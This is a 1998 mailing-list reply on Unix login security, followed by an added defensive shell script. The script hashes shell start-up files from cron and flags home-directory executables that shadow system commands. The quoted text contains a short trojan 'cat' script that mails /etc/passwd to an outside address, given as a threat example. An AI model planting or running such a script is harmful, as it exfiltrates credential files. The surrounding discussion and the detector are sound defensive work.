On Sun, 30 Aug 1998, Mike wrote:
{Snips}
}Now a hacker creates a script in that user's home directory, called cat,
}that does
}#!/bin/bash
}/bin/cat /etc/passwd | mail [EMAIL PROTECTED]
}/bin/cat $*
}
}Now the next time your user logs in, your password file gets mailed and
}the hacker can carry out a dictionary attack. Not good.

Internal script to run an MD5 check of your .*rc files? (Do it every n
minutes as a cron(tab?) item?)

Makes me wonder about "rolling password" algorithms, that require a
different, deterministically-created (chaos better than CRC-type basis)
password at every logon. However, carrying around a programmable calc.
(or other hdwe.) to generate the current password is pretty bad.

I haven't yet had a PPP (or SLIP) account. The more I read, the more I
feel that a shell server at my ISP is a fairly-decent firewall!

|* Nicholas Bodley *|* Electronic Technician {*} Autodidact & Polymath
|* Waltham, Mass. *|* -----------------------------------------------
|* [EMAIL PROTECTED] *|* The personal computer industry will have become
|* Amateur musician *|* mature when crashes become unacceptable.
--------------------------------------------------------------------------
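
Added example, not part of the original thread: one way to run the periodic start-up-file check suggested above from cron, together with a check for a planted command such as the `cat` script in the quoted text. It uses SHA-256 (sha256sum from GNU coreutils, assumed present) in place of MD5; the function names, the script name and the baseline path are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original thread. Assumes GNU coreutils sha256sum.

# rc_hashes DIR: print "hash  path" for each shell start-up file in DIR
# (the .*rc files from the post, plus the usual login files).
rc_hashes() {
    for f in "$1"/.*rc "$1"/.profile "$1"/.bash_profile "$1"/.login; do
        if [ -f "$f" ]; then sha256sum "$f"; fi
    done
    return 0
}

# rc_check DIR BASELINE: list start-up files added, removed or modified since
# BASELINE was written by `rc_hashes DIR > BASELINE`. Returns 1 on any change.
rc_check() {
    cur=$(mktemp) || return 2
    rc_hashes "$1" > "$cur"
    changed=$(diff "$2" "$cur" | sed -n 's/^[<>] [0-9a-f]*  //p' | sort -u)
    rm -f "$cur"
    [ -z "$changed" ] && return 0
    printf '%s\n' "$changed"
    return 1
}

# shadowed_cmds DIR [SYSDIR...]: list executables in DIR whose name matches a
# command in a system directory (default /bin and /usr/bin), e.g. a planted "cat".
shadowed_cmds() {
    dir=$1; shift
    [ $# -gt 0 ] || set -- /bin /usr/bin
    for f in "$dir"/*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        for d in "$@"; do
            if [ -x "$d/${f##*/}" ]; then printf '%s\n' "$f"; break; fi
        done
    done
    return 0
}

# Command-line use with a fixed PATH, so the checker's own tools cannot be
# shadowed. Hypothetical crontab entry:
#   */15 * * * * /usr/local/sbin/rccheck.sh check /home/user /var/lib/rccheck/user.sha256
case "${1:-}" in
    baseline) PATH=/usr/bin:/bin; rc_hashes "$2" > "$3" ;;
    check)    PATH=/usr/bin:/bin; rc_check "$2" "$3"; rc=$?
              shadowed_cmds "$2"; exit "$rc" ;;
esac
```

The baseline only means something if it is stored where the account being checked cannot write; cron mails any output, so a clean run stays silent.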